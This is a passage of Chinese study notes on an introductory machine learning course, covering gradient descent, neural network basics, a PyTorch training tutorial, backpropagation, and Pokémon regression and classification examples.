    • 如果 $e=(y-\hat y)^2$,则 $L$ 为均方误差(MSE)

    如果 $y$ 和 $\hat y$ 都是概率分布,则用交叉熵损失函数(Cross-entropy)

    3.Optimization

    $$w*,b*=arg\min_{w, b}L$$

    ​ 找到使 $L$ 值最小时 $w$ 和 $b$ 的取值。

    png

    先考虑只有参数 $w$ 的情况:

    $$w^*=arg\min_w L$$

    使用梯度下降方法:

    -(随机)挑选一个初始值 $w^0$

    • 计算 $L$ 对 $w$ 的导数 $\frac{\partial L}{\partial w}|_{w=w^0}$

    • 迭代更新 $w$,$w^1\leftarrow w^0 - {\color{Red} \eta } \frac{\partial L}{\partial w}|_{w=w^0}$

      • 其中 ${\color{Red} \eta }$ 被称为学习率(learning rate),这是由用户自行设定的。
        • 由用户自行设定的参数被称为超参数(hypermeters)

    ​ 梯度下降方法只能找到 $L$ 的极小值(local minima)而不是最小值(global minima),但这不是梯度下降方法最大的问题。

    ​ 为什么不采用暴力搜索的方法查找最小值?如果参数过多,暴力搜索的方法就无法实现了,只能采用梯度下降方法。

    png

    ​ 对于多个参数 $w$ 和 $b$,原理相同。

    ​ 至于求导,可以由深度学习框架自行解决。

    ​ 何时停止迭代?当算得的梯度为 0 或者人为终止迭代。

    $$\bigtriangledown L = \begin{bmatrix}
    \frac{\partial L}{\partial w} \
    \frac{\partial L}{\partial b}
    \end{bmatrix}_{\mathrm{gradient}}$$

    因而得名梯度下降。

    png

    ​ 随着迭代次数增加,$L$ 值逐渐减小。

    ​ 在这个示意图中,红色表示 $L$ 值较大,蓝色表示 $L$ 值较小。

    总结

    png

    ​ 最后的训练好的模型中 $w*=0.97$,$b=0.1k。$对于训练集(2017-2020 中各天本频道观看人数):$L(w^, b^*)=0.48k$。

    ​ 而对于训练时未用到的数据(2021 中各天本频道观看人数),$L’=0.58k$。

    png

    ​ 训练好的模型只是简单地认为当日的本频道观看人数与前一日本频道观看人数有关,而从实际情况可以看出,本频道观看人数似乎有一定的周期性,如一周的周末中本频道观看人数较少。

    png

    ​ 调整模型,如 $y=b+\sum^7_{j=1}w_jx_j$,就考虑本频道观看人数情况与前一周的本频道观看人数情况有关,此时 $L$ 和 $L’$ 都有所下降。

    ​ 若 $y=b+\sum^{28}_{j=1}w_jx_j$,则 $L$ 和 $L’$ 又有所下降。

    ​ 而当 $y=b+\sum^{56}_{j=1}w_jx_j$ 时,$L$ 和 $L’$ 不再下降,说明再扩大天数并不能更好地优化模型了。

    ##【機器學習 2021】預測本頻道觀看人數 -下- - 深度學習基本概念簡介

    1.Function with Unknown Parameters

    png

    ​ 也许**线性模型(Linear models)**太过简单,我们需要更复杂的模型。如图所示,如果真实模型像红色折线的那样,则你无论怎么训练线性模型,都无法很好地拟合真实情况。

    Model Bias 一般是由于模型设计太过简单,此时再进行训练也无法找到更好的参数来使 $L$ 降低。

    png

    ​ 我们可以将这个红色折线由一个常数和若干个 Hard Sigmoid 函数之和来表示:$y=b+\sum_ic_i\mathrm{sigmoid}(b_i+w_ix_1)$。

    png

    ​ 任何折线都可以用这种形式来表示,只要 Hard Sigmoid 函数管够就行。

    ​ Sigmoid 函数的个数?由用户自行设定,这也是一个 hypermeters。

    png

    ​ 用片状线性曲线近似连续曲线。为了有好的近似,我们需要足够的片断。

    png

    ​ 一般用 Soft Sigmoid 函数(往往称为 Sigmoid 函数)去逼近这个 Hard Sigmoid 函数。

    Sigmoid 函数:$y=c\frac{1}{1+e^{-(b+wx_1)}}=c\mathrm{sigmoid}(b+wx_1)$

    png

    • 不同的 $w$ 会修改 Sigmoid 函数的坡度

    • 不同的 $b$ 会平移 Sigmoid 函数

    • 不同的 $c$ 会修改 Simoid 函数的高度

    png

    ​ 这样我们就得到了一个具有更多特征的新的回归模型:$y=b+\sum_ic_i\mathrm{sigmoid}\left(b_i+\sum_jw_ijx_j\right)$

    png

    • $i$ 表示 Sigmoid 函数的序号
    • $j$ 表示特征的序号
    • $w_{ij}$ 表示第 $i$ 个 Sigmoid 函数第 $x_j$ 的权重

    png

    ​ 再通过激活函数和相加后得到最后的回归模型 $y$。

    png

    ​ 这个表达式可以用向量乘法简单表示。

    png

    ​ 将所有参数拉长变成一个向量 $\theta$。

    2.Define Loss from Training Data

    ​ 损失函数 $L$ 与之前没有什么变化,但是由于参数变多,用 $L(\theta)$ 表示。

    png

    3.Optimization

    png

    png

    ​ 现在问题变为 $\mathbf{\theta}^*=arg\min_\theta L$,方法与之前类似,只不过参数变多了。

    ​ 用 $\mathbf{g}$ 对各个参数的导数总和作简写。

    png

    ​ 由于参数量过多,要把数据集分成多个 batch 来更新参数 $\mathbf{\theta}^*$。一次计算完所有数据集的迭代过程称为 epoch

    png

    ​ 举例:

    • 如果有 10000 个数据,Batch 的大小为 10,则一次 epoch 需要更新 1000 次参数。
    • 如果有 1000 个数据,Batch 的大小为 100,则一次 epoch 需要更新 10 次参数。

    Batch 的大小也是一个 hypermeters。

    png

    ​ 也可以用两个 ReLU 叠加起来来代替 Sigmoid 函数来逼近 Hard Sigmoid 函数。

    png

    ​ 我们把这种函数称之为激活函数,一般来说 ReLU 会比 Sigmoid 效果更好些。

    png

    ​ 我们用多个 ReLU 来逼近最终的回归曲线,可以看到随着 ReLU 的个数增多,$L$ 的值有所下降。

    png

    ​ 我们也可以进行多次这种计算,形成深度神经网络

    png

    ​ 3 层神经网络的预测结果,由于模型中并没有考虑春节的因素,在春节前后误差较大。

    png

    ​ 给所接触到的东西作一个统一的命名。

    png

    ​ 随着时代的发展,神经网络的层数越来越多,准确率越来越好。

    Residual Net 并不是简单的 Fully Connected Network,使用了 Special structure,不然很可能会过拟合。

    png

    ​ 神经网络的层数并不是越多越好,过多的层数可能会出现过拟合的现象。

    Class Material

    ##【機器學習 2022】開學囉- 又要週更了-

    机器学习课程速览

    ​ This course focuses on Deep Learning.

    png

    ​ 在机器学习中,输入的数据可以是向量矩阵(如图像)、序列(如语音,文本),输出的数据可以是标量(回归)、类别(分类)、文本、图像等。

    教机器的种种方法

    • HW1:COVID-19 Case Prediction 新冠感染人数预测
      • 输入向量、输出标量
    • HW2:Phoneme Classification 因素分类
      • 输入向量、输出类别
    • HW3:Image Classification 图像分类
      • 输入矩阵、输出类别
    • HW4:Speaker Classification 说话者分类
      • 输入序列、输出类别
    • HW5:Machine Translation 机器翻译
      • 输入序列、输出文本
    • HW6:动漫脸谱生成

    Lecture 1 - 5 有监督学习

    png

    课程 1-5 属于有监督学习,以给一张图片,让机器分类是宝可梦还是数码宝贝为例,训练集需要有对应的标签。

    Lecture 7 自监督学习

    png

    ​ 要在深度神经网络中应用监督学习,我们需要足够的标记数据。但是人工手动标记数据既耗时又昂贵。对于一些特殊的领域,比如医学领域获取足够的数据本身就是一个挑战。因此,监督学习当前的主要瓶颈是标签生成和标注。

    自监督学习是通过以下方式将无监督问题转化为有监督问题的方法。

    png

    预训练模型 Pre-trained Model(基础模型 Foundation Model) 之于 下游模型 Downstream Tasks 相当于 操作系统 之于 应用。

    ​ AI 专家将大模型统一命名为 Foundation Models,可以翻译为基础模型或者是基石模型。

    Lecture 6 GAN

    png

    GAN:是训练集的输入 $x$ 和输出 $y$ 不必配对地出现。

    png

    常见领域:

    Lecture 12 强化学习

    png

    ​ 在人也不能确定最优解时——强化学习

    进阶课题——不只是追求正确率

    Lecture 8 异常检测

    png

    ​ 让机器在能识别这个图像是宝可梦还是神奇宝贝的同时,还能识别异常图片,返回”I don’t know“。

    Lecture 9 Explainable AI

    png

    ​ 让机器知其然还要知其所以然。

    png

    ​ 举例,在机器判别图片是宝可梦还是神奇宝贝的过程中,将其判别的主要依据用特定的记号标记,然而判别的主要依据不在生物本身上?

    png

    ​ 最后发现原因:宝可梦的所有图片都是 PNG 格式,而大多数数码宝贝的图片是 JPEG 格式。机器根据背景颜色区分宝可梦和数码宝贝。

    Lecture 10 Model Attack

    png

    ​ 往图片中一定的噪音,可能会出现截然不同的判别结果。

    攻防问题

    • 攻:通过加入某些噪音破坏判别结果
    • 防:防止某些噪音破坏判别结果

    Lecture 11 领域适应性

    png

    ​ 在黑白图像中训练好的模型,在黑白图像里测试准确率好,但在彩色图像中准确率差。

    Lecture 神经网络压缩

    png

    ​ 在资源受限的环境中部署 ML 模型。

    Lecture 14Life-long Learning

    png

    ​ Life-long Learning 的目标,让机器能解决各种问题。

    学习如何学习

    Lecture 15 元学习

    png

    ​ 少量的学习通常是通过元学习实现的。让机器自己找到一个机器学习的算法。

    ML 2022 PyTorch Tutorial 1

    安装 pytorch

    按照官方的方法是从官网 PyTorch 安装 pytorch 环境,但这在国内下载真的好慢……

    png

    鼓捣了老半天觉得用离线安装的方式比较好 orz

    从镜像站 https://download.pytorch.org/whl/torch_stable.html 下载对应版本的torchtorchvision

    下载了 cu117/torch-1.13.1%2Bcu117-cp39-cp39-win_amd64.whl cu117/torchvision-0.14.1%2Bcu117-cp39-cp39-win_amd64.whl

    在下载到的目录进入 cmd 使用pip install torch-l.13.1+cul17-cp39-cp39-win amd64.whlpip install torchvision-0.14.1+cu117-cp39-cp39-win amd64.whl安装。

    在 python 中验证:

    import torch

    print(torch.__version__)
    print(torch.cuda.is_available()) # cuda 显卡是否可以使用
    1.13.1+cu117
    True

    Training Neural Networks

    训练神经网络的步骤:

    • 定义神经网络结构,定义损失函数,定义优化算法
    • 训练

    Training & Testing Neural Networks

    在训练模型中使用训练集 Training 和 验证集 Validation,测试模型时使用 Testing。

    Training & Testing Neural Networks - in Pytorch

    Step 1.torch.utils.data.Dataset & torch.utils.data.DataLoader

    Dataset & Dataloader

    DataSet: 存储数据样本 $x$ 和预期值 $y$

    Dataloader: 对数据进行分批分组 groups data in batches,实现多任务处理

    dataset = MyData(file)
    dataloader = DataLoader(dataset, batch_size, shuffle=True)

    机器学习,深度学习模型训练阶段的 Shuffle 重要么?为什么?_技术宅 zch 的博客-CSDN 博客_深度学习 shuffle

    • 对于 Training 和 Validation,需要打乱,shuffle=True
    • 对于 Testing,不需要打乱,shuffle=False

    如下列代码就将数据集分成 5 给 batch:

    dataset = MyDataset(file)
    dataloader = DataLoader(dataset, batch_size=5, shuffle=False)

    png

    设计一个 MyDataset 类用于管理数据集:

    from torch.utils.data import Dataset, DataLoader


    class MyDataset(Dataset):
    def __init__(self, file):
    """读取数据并初始化"""
    self.data = ...


    def __getitem__(self, index):
    """返回一个数据"""
    return self.data[index]


    def __len__(self):
    """返回数据集的大小"""
    return len(self.data)
    Tensors

    pytorch 中的 Tensors 就是高维数组,相当于 numpy 中的 array

    dim in PyTorch == axis in NumPy

    创建 tensor
    • 直接填入数据,list 或 numpy.ndarray
    x = torch.tensor([[1, -1], [-1, 1]])
    x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
    • 输入形状,填入 0 或 1
    x = torch.zeros([2, 2])
    x = torch.ones([1, 2, 5])
    常见运算符
    • 加法
    z = x + y
    • 减法
    z = x - y
    • 乘方
    y = x.pow(2)
    • 求和
    y = x.sum()
    • 均值
    y = x.mean()
    • 转置
    x = x.transpose(0, 1)
    • Squeeze 移出某个维度

    png

    • Unsqueeze 添加某个维度

    png

    • Cat 拼接数组

    png

    PyTorch v.s. Numpy

    数据类型:

    Data typedtypetensor
    32-bit floating pointtorch.floattorch.FloatTensor
    64-bit integer (signed)torch.longtorch.LongTensor
    PyTorchNumpy
    x.shapex.shape
    x.dtypex.dtype
    x.reshape / x.viewx.reshape
    x.squeeze()x.squeeze()
    x.unsqueeze(1)np.expand_dims(x, 1)
    Device

    自行选择 CPU 或 Cuda 对 Tensors 进行运算。

    CPU

    x = x.to(‘cpu’)

    GPU

    x = x.to(‘cuda’)
    计算梯度

    定义 $x$,并事先告知需要计算梯度 requires_grad=True

    $$x=\begin{bmatrix}1 & 0 \ -1 & 1\end{bmatrix}$$

    x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)

    $$z=\sum_i\sum_j x^2_{i,j}$$

    z = x.pow(2).sum()

    求导

    $$\frac{\partial z}{\partial x_{i,j}}=2x_{i,j}$$

    z.backward()

    得到 $x$ 的梯度

    $$\frac{\partial z}{\partial x}=\begin{bmatrix}2&0\-2&2\end{bmatrix}$$

    x.grad
    tensor([[ 2., 0.], [-2., 2.]])

    Step 2.torch.nn.Module

    • 全连接层
    layer = torch.nn.Linear(32, 64)
    • 激活函数
    nn.Sigmoid()
    nn.ReLU()

    将定义的神经网络模型放在MyModel类中:

    import torch.nn as nn
    class MyModel(nn.Module):
    def __init__(self):
    """初始化你的模型,定义神经网络层"""
    super(MyModel, self).__init__()
    self.net = nn.Sequential(
    nn.Linear(10, 32),
    nn.Sigmoid(),
    nn.Linear(32, 1)
    )


    def forward(self, x):
    """计算你的 NN 的输出"""
    return self.net(x)

    可以不使用nn.Sequential,效果与下面的代码作用一致

    import torch.nn as nn

    class MyModel(nn.Module):
    def __init__(self):
    super(MyModel, self).__init__()
    self.layer1 = nn.Linear(10, 32)
    self.layer2 = nn.Sigmoid(),
    self.layer3 = nn.Linear(32,1)


    def forward(self, x):
    out = self.layer1(x)
    out = self.layer2(out)
    out = self.layer3(out)
    return out

    Step 3.torch.nn.MSELoss torch.nn.CrossEntropyLoss etc.

    定义损失函数

    • MSE
    criterion = nn.MSELoss()
    • 交叉熵损失函数
    criterion = nn.CrossEntropyLoss()
    • 输入预测值和实际值计算 loss
    loss = criterion(model_output, expected_value)

    Step 4.torch.optim

    找到一个函数以减少 loss 的值,如 随机梯度下降法 Stochastic Gradient Descent (SGD)

    torch.optim.SGD(model.parameters(), lr, momentum = 0)

    Step 5.Entire Procedure

    Neural Network Training Setup

    完整流程:读取数据-分割数据-定义模型-定义损失函数-定义优化函数

    dataset = MyDataset(file)
    tr_set = DataLoader(dataset, 16, shuffle=True)
    model = MyModel().to(device)
    criterion = nn.MSELoss()
    optimizer = torch.optim.SGD(model.parameters(), 0.1)
    Neural Network Training Loop

    训练过程:

    for epoch in range(n_epochs):  # 进行一个 epoch
    model.train() # 将模型设为 train 模式
    for x, y in tr_set: # 从 dataloader 中读入 x, y
    optimizer.zero_grad() # 将梯度设为 0
    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
    pred = model(x) # 前向传播(得到输出值)
    loss = criterion(pred, y) # 计算 loss
    loss.backward() # 计算梯度(backpropagation)
    optimizer.step() # 优化参数
    Neural Network Validation Loop

    上接上面的 epoch 循环:

    model.eval()  # 将模型设为 evaluation 模式
    total_loss = 0 # 初始化 loss
    for x, y in dv_set: # 从 dataloader 中读入 x, y
    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
    with torch.no_grad(): # 禁用梯度计算
    pred = model(x) # 计算输出值 pred
    loss = criterion(pred, y) # 计算 loss
    total_loss += loss.cpu().item() * len(x) # 将所有 loss 加到一起
    avg_loss = total_loss / len(dv_set.dataset) # 计算平均 loss
    Neural Network Testing Loop
    model.eval()  # 将模型设为 evaluation 模式
    preds = [] # 定义一个列表存储预测值
    for x in tt_set: # 从 dataloader 中读入 x
    x = x.to(device) # 将数据放入设备(CPU/Cuda)
    with torch.no_grad(): # 禁用梯度计算
    pred = model(x) # 计算输出值 pred,即预测结果
    preds.append(pred.cpu()) # 生成预测结果
    Notice - model.eval(), torch.no_grad()
    • model.eval() 改变一些模型层的行为,如 dropout 和 batch normalization。
    • with torch.no_grad()防止计算结果被添加到梯度计算的图。通常用于防止在验证/测试数据上的意外训练。
    存/读 训练模型
    • Save
    torch.save(model.state_dict(), path)
    • Load
    ckpt = torch.load(path)  # 保存文件路径
    model.load_state_dict(ckpt) # 保存 ckpt 文件

    More About PyTorch

    • torchaudio
      • speech/audio processing
    • torchtext
    • natural language processing
    • torchvision
      • computer vision
    • skorch
      • scikit-learn + pyTorch
    • Useful github repositories using PyTorch
      • Huggingface Transformers (transformer models: BERT, GPT, …)
      • Fairseq (sequence modeling for NLP & speech)
      • ESPnet (speech recognition, translation, synthesis, …)
      • Most implementations of recent deep learning papers

    Extra Material

    Introduction of Deep Learning

    png

    Deep Learning 使用次数越来越频繁。

    png

    Deep Learning 的历史:

    • 1958: Perceptron (linear model) 线性感知机
    • 1969: Perceptron has limitation 线性感知机有明显的局限性,如不能处理异或问题
    • 1980s: Multi-layer perceptron 多层感知机
      • Do not have significant difference from DNN today 与当今深度神经网络并无明显差别
    • 1986: Backpropagation 反向传播
      • Usually more than 3hidden layers is not helpful 多余 3 层的隐藏层并没有明显效果
    • 1989: 1hidden layer is “good enough”, why deep? 1 层隐藏层即可,为什么要多层?
    • 2006: RBM initialization (breakthrough) 受限玻尔兹曼机(RBM)学习 - 知乎 (zhihu.com)
    • 2009: GPU 显卡加速神经网络的训练速度
    • 2011: Start to be popular in speech recognition 在语音识别中效果显著
    • 2012: win ILSVRC image competition 赢得 ILSVRS 图像识别比赛

    png

    Deep Learning 的步骤与传统机器学习方法类似:

    • Step 1:define a setof function 在 Deep Learning 中为设置神经网络的结构
    • Step 2:goodness offunction
    • Step 3: pickthe bestfunction

    png

    png

    在神经网络前向传播的过程中其实就是一系列矩阵运算,因此使用 GPU 速度比 CPU 要更快。

    png

    神经网络的隐藏层就相当于传统机器学习方法中 Feature extractor replacingfeature engineering 的过程。

    如果是一个分类问题,在输出层要进行 Softmax 操作,输出期望值最高的类别。

    png

    对于手写体数字识别,输出的是一个向量,值最高的就是输出的类别。

    png

    此时神经网络中的隐藏层就是一个手写体数字识别函数集。你设定一个好的神经网络结构,以拟合出一个好的函数。

    png

    Q: 设置神经网络需要多少层?每层需要多少神经元?

    A: 需要开发者的不断试错和直觉。

    Q: 我们可以让机器来自动设计神经网络吗?

    A: 如 [Evolutionary Artificial Neural Networks (researchgate.net)](https://www.researchgate.net/publication/2861461_Evolutionary_Artificial_Neural_Networks#:~:text=Evolutionary artificial neural networks (EANNs) refer to a,(GAs)%2C evolutionary programming (EP)%2C or other evolutionary algorithms.),但是没有那么通用

    Q: 其他形状的神经网络结构?

    A: 如卷积神经网络

    png

    定义损失函数,由于 $y$ 和 $\hat y$ 都是概率分布,使用交叉熵损失函数(Cross-entropy)

    $$C(y,\hat y)=-\sum^{10}_{i=1}\hat{y_i}\ln y_i$$

    png

    最终的损失函数表示为 $L=\sumN_{n=1}Cn$,目标就是通过调整隐藏层中的参数使 $L$ 取得最小值。

    png

    搜索 $L$ 的最小值的方法:梯度下降。

    就连 Alpha Go 也使用梯度下降。

    png

    反向传播:计算各种微分的有效方式。人工计算微分总是很麻烦,往往使用现成的库。

    png

    理论:只要神经元个数够多,总能拟合出任意函数。

    png

    其他资源:

    Backpropagation

    png

    backpropagation 反向传播算法是在梯度下降算法中计算梯度一种有效率的算法。

    png

    链式法则

    • Case 1 $y=g(x)\ z=h(y)$
      • $\Delta x \rightarrow \Delta y \rightarrow \Delta z$
      • 要求 $z$ 对 $x$ 的导数:$\frac{dz}{dx}=\frac{dz}{dy}\frac{dy}{dx}$
    • Case 2 $x=g(s)\ y=h(s)\ z=k(x,y)$
      • 要求 $z$ 对 $s$ 的导数:$\frac{dz}{ds}=\frac{\partial z}{\partial x}\frac{dx}{ds}+\frac{\partial z}{\partial y}\frac{dy}{ds}$

    png

    对于梯度下降方法,需要求 $L$ 对各个神经元 $w$ 的权重:

    $$L(\theta)=\sumN_{n=1}Cn(\theta)\rightarrow \frac{\partial L(\theta)}{\partial w}=\sum^N_{n=1}\frac{\partial C^n(\theta)}{\partial w}$$

    要求 $\frac{\partial L(\theta)}{\partial w}$ 就要求 $\frac{\partial C}{\partial w}$。

    png

    根据链式法则,$\frac{\partial C}{\partial w}=\frac{\partial z}{\partial w}\frac{\partial C}{\partial z}$

    对于 Forward pass,用于计算 $\frac{\partial z}{\partial w}$,

    对于 Backward pass,用于计算 $\frac{\partial C}{\partial z}$,$z$ 是神经元的输出数据。

    png

    对于 Forward pass,如示意图,$z=x_1w_1+x_2w_2+b$,因此$\frac{\partial z}{\partial w_1}=x_1$,$\frac{\partial z}{\partial w_2}=x_2$,值就是输入进来的权重 $w$。

    png

    png

    而对于 Backward pass,用于计算 $\frac{\partial C}{\partial z}$根据链式法则,$\frac{\partial C}{\partial z}=\frac{\partial a}{\partial z}\frac{\partial C}{\partial a}=\frac{\partial z’}{\partial a}\frac{\partial C}{\partial z’}+\frac{\partial z’‘}{\partial a}\frac{\partial C}{\partial z’'}$

    $z$ 对上一个神经元经过激活函数后的输出 $a$ 很好计算(就是其权重 $w$),难点是交叉熵损失函数 $C$ 对 $z$ 的导数。

    png

    此时就要通过神经元后面的数据来计算 $\frac{\partial C}{\partial z}=\sigma’(z)\left[w_3\frac{\partial C}{\partial z’}+w_4\frac{\partial C}{\partial z’'}\right]$

    其中 $\sigma’(z)$ 就是激活函数的导数,是一个常数,因为 $z$ 的值已经在 forward pass 中得到。

    对于 Sigmoid 函数 $f(x)=\frac{1}{1+e^{-x}}$,其导函数 $f’(x)=f(x)\left[1-f(x)\right]$

    png

    如果当前层的下一层是输出层,则可以根据输出的值计算 $\frac{\partial C}{\partial z’}$

    png

    如果不是,则要递归地计算下一层的 $\frac{\partial C}{\partial z}$,直到下一层为输出层。

    png

    png

    最后总结,通过 Forward Pass 计算得到 $\frac{\partial z}{\partial w}=a$,再通过 Backward Pass 计算得到 $\frac{\partial C}{\partial z}$,两者相乘就得到要求的 $\frac{\partial C}{\partial w}$。

    Predicting Pokémon CP

    这是一个回归问题的案例分析。

    png

    回归 Regression 可以

    • 预测股票

      • 输入股票曲线,输出明天的道琼指数
    • 自动驾驶

      • 输入周边环境,输出操纵方向盘
    • 商品推荐

      • 输入使用者和商品,输出购买可能性

    png

    课程的案例分析是:

    已知宝可梦的战力值 $x_{cp}$,类型 $x_s$,体力 $x_{hp}$,重量 $x_w$,身高 $x_h$,尝试推测进化后的宝可梦的 CP(战力)值 $y$

    Step 1: Model

    png

    先假定一个线性模型,进化后的战力值只与当前战力值相关,$y=b+wx_{cp}$。

    Step 2: Goodness of Function

    png

    训练集是 10 个宝可梦的数据,记作 $(x^1,\hat y^1), (x^2, \hat y2)…(x10, \hat y^{10})$。

    png

    设计损失函数估算误差 Estimation error:$\mathrm{L}(f)=\mathrm{L}(w, b)=\sum^{10}{n=1}\left(\hat y^n - (b+w\cdot x^n{cp})\right)$

    Step 3: Gradient Descent

    png

    使用梯度下降方法以解决 $w^*=arg\min_wL(w)$

    png

    梯度下降只能找到极小值而不能保证找到最小值,在初始参数不同的时候可能会得到不同的结果。

    但在线性模型中,这个问题不存在,因为此时极小值就是最小值。

    png

    此时得到的训练模型 $b=-188.4, w=2.7$,在训练集中 $L=35.0$,在测试集中 $L=31.9$

    png

    考虑将模型换为更复杂的模型,此时 $L$ 值有所下降。

    Model Selection

    png

    选择的模型次数越高,模型在训练集上的 $L$ 值越小,但在测试集值中可能不降反增 $L$,这个现象称之为过拟合

    就好比你在驾校练车,练着练着发现了查看某些标记点开车效果更好,但在真实道路上并不能表现得更好。

    png

    考虑其他因素对 $y$ 的影响,如宝可梦本身的种族,不同的种族应用不同的线性模型。

    png

    引入独热编码,此时模型变为 $y=b+\sum w_ix_i$。

    png

    此法再次有效地降低了 $L$。

    png

    当模型过于复杂时,还是会出现过拟合的问题。

    png

    尝试修改 $L$ 的表达式,$L=\sum_n\left(\hat y^n-\left(b+\sum w_ix_i\right)\right)^2+{\color{Red}\lambda \sum(w_i)^2}$,这样当函数曲线变得不够平滑时,会得到一定的惩罚。

    png

    $\lambda$ 是一个超参数,太大太小都不好。We prefer smooth function, but don’t be too smooth.

    Pokemon classification

    Classification: Probabilistic Generative Model 分类:概率生成模型

    png

    分类问题:接受输入 $x$,输出分类的类别 $n$。

    实例:

    • Credit Scoring 信用评分
      • Input: income, savings, profession, age, past financial history…
      • Output: accept or refuse 借不借你钱
    • Medical Diagnosis 医疗诊断
      • Input: current symptoms, age, gender, past medical history …
      • Output: which kind of diseases 你得了啥病
    • Handwritten character recognition 手写体识别
      • Input: 手写图像
      • Output: 写的啥字

    png

    课程案例:根据宝可梦的种族值(血量、攻击、防御、特攻、特防、速度)预测这只宝可梦的属性。

    png

    如果强行把分类问题看作是一个回归问题:训练时把类别 1 当作输入为 1,把类别 2 当作输出为 -1

    测试时输出越接近 1,越认为是类别 1;输出越接近 -1,越认为是类别 2。

    png

    回归会将由于一些“太正确”的点而改变回归直线使得分类不正确。如果要分的类别更多则效果更差。

    png

    理想的替代:

    • 函数模型
      • $x$ 在 $f(x)$ 中,如果 $g(x)>0$,则认为是类别 1,否则是类别 2
    • 损失函数
      • $L(f)=\sum_n\delta(f(x^n)\ne \hat y^n)$,得到错误分类数据的次数
    • 找到一个方法使得 $L$ 最小
      • 例子:感知机,SVM

    png

    使用概率模型:

    $$P(x)=P(x|C_1)P(C_1)+P(x|C_2)P(C_2)$$

    png

    我们把序号 $< 400$ 的宝可梦当作训练集,其余当作测试集。

    序号 $< 400$ 的宝可梦中有 $79$ 只水系,$61$ 只普通系,因此 $P(C_1)=79/(79+61)=0.56, P(C_2)=61/(79+61)=0.44$

    png

    我们先假设宝可梦的种族只与宝可梦的防御和特防有关。

    如可达鸭的防御为 48,特防为 50,则它的特征向量为 $\begin{bmatrix} 48 \ 50 \end{bmatrix}$。

    我们假设水系宝可梦的防御和特防服从正态分布。

    png

    正态分布函数:

    $$f_{\mu,\Sigma}(x)=\frac{1}{(2\pi){D/2}}\frac{1}{|\Sigma|{1/2}}\exp{-\frac{1}{2}(x-\mu)T\Sigma{-1}(x-\mu)}$$

    • Input: vector $x$
    • output:
      • probability of sampling 采样概率 $x$
      • The shape of the function determines by mean 均值 $\mu$ and covariance matrix 协方差矩阵 $\Sigma$ 函数的图像由均值和协方差矩阵决定。

    png

    假设这些点是从高斯分布中取样的。
    找到它们背后的高斯分布。

    png

    最大似然估计法

    具有任何均值 $\mu$ 和协方差矩阵 $\Sigma$ 的高斯分布可以生成这些点

    当给定样本 $x1,x2,x3,…,x{79}$ 时,$\mu$ 和 $\Sigma$ 取得对应值的概率

    评估函数:

    $$L(\mu,\Sigma)=f_{\mu,\Sigma}(x1)f_{\mu,\Sigma}(x2)f_{\mu,\Sigma}(x3)…f_{\mu,\Sigma}(x{79})$$

    png

    为了让 $L$ 最小,$\mu$ 取样本的均值,$\Sigma$ 取样本的协方差。

    png

    此时计算两个属性的宝可梦样本的 $\mu$ 和 $\Sigma$。

    png

    在公式的参数都可求后,我们便可以进行分类。

    当 $P(C_1|x)>0.5$ 时,我们便认为样本 $x$ 属于类别 1。

    png

    然而这效果并不好…即使把所有因素都考虑进去,也只有 54% 的准确率。

    png

    开始调整模型,假设两个分类的协方差矩阵相同。

    png

    此时两种属性共用 $\Sigma = \frac{79}{140}\Sigma1+\frac{61}{140}\Sigma2$

    png

    此时分类边界又变成了直线,虽然与回归直线完全不同,但我们也把它称之为线性模型。

    将所有因素考虑进来,准确率提升至 73%。

    png

    总结 3 个步骤:

    • 建立模型
    • 评价函数好坏
    • 找到一个最好的函数

    png

    如果你假定所有分布都是独立的,则说明你在使用朴素贝叶斯分类器

    而对于二分类问题,你不要使用高斯分布,而是使用伯努利分布。

    png

    分析为什么边界是一条直线?

    将 $P(C_1|x)$ 推演成用 Sigmoid 函数来表示的形式 $P(C_1|x)=\sigma(z)$

    png

    png

    png

    一阵推演,$z$ 可以用一个线性式表示。

    $P(C_1|x)=\sigma(w\cdot x + b)$,将 $\Sigma$ 共用的时候,class 1 和 class 2 的 boundary 是线性的。

    我们可以直接找到 $w$ 和 $b$ 以求得边界而绕开计算 $N_1,N_2,\mu1,\mu2,\Sigma$ 吗?且听下回分解。

    Logistic Regression

    png

    由上节课得到选取的函数模型 $f_{w,b}(x)=P_{w,b}(C_1|x)$

    png

    $$f_{w,b}(x)=\sigma(z),z=\sum_iw_ix_i$$

    png

    定义评估函数

    $$L(w,b)=f_{w,b}(x1)f_{w,b}(x2)\left(1-f_{w,b}(x3)\right)…f_{w,b}(xN)$$

    目标是选取 $w*,b*$,使得 $L$ 最大。

    png

    将分类的类别用 $\hat y^n$ 表示,1 表示类别 1,0 表示类别 2。

    将问题由查找 $arg\max_{w,b}L(w,b)$ 转为 $arg\min_{w,b}-\ln L(x,b)$

    png

    最后得到由伯努利分布的交叉熵损失函数表示 $-\ln L(w,b)$。

    png

    为什么在 Logistics Regression 中,不像 Linear Regression 一样使用 square error?

    png

    查找一个最好的函数:求出 $-\ln L(w,b)$ 的最小值。

    依旧使用梯度下降方法。

    png

    png

    最后得到的方法与 Linear Regression 一样。

    总结:

    StepLogistic RegressionLinear Regression
    1 定义模型$f_{w,b}(x)=\sigma\left(\sum_iw_ix_i+b\right)$,值域 $[0,1]$$f_{w,b}(x)-\sum_iw_ix_i+b$,输出可以是任意值
    2 衡量模型好坏对于训练集:$(x^n,\hat y^n)$
    对于 $\hat y^n$:1 表示类别 1,0 表示类别 2
    损失函数:$L(f)=\sum_n C(f(x^n),\hat y^n)$,交叉熵损失函数
    对于训练集:$(x^n,\hat y^n)$
    对于 $\hat y^n$:真实值
    损失函数:$L(f)=\frac{1}{2}\sum_n (f(x^n)-\hat yn)2$,MSE
    3 查找最佳模型两者相同两者相同

    png

    当 Logistic Regression 使用 Square Error 作为损失函数?

    出现微分值为 0 的情况,导致参数无法迭代更新。

    png

    Cross Entropy 与 Square Error 的对比,Square Error 的梯度在 Logistics Regression 中太平缓,不利于训练。

    png

    对于 $P(C_1|x)=\sigma(w\cdot x + b)$:

    Discriminative 判别模型直接查找 $w$ 和 $b$

    Generative 概率模型需要计算样本的 $\mu1,\mu2,\Sigma^{-1}$

    两者选取的模型相同,但是最终得到的函数往往不同。

    png

    同样的模型,同样的训练数据,采用两种方法所得结果 $(w,b)$ 不同。因为生成模型对概率分布事先做了假设。所以一般来说,Discriminative model 会比 Generative model 表现更好。

    png

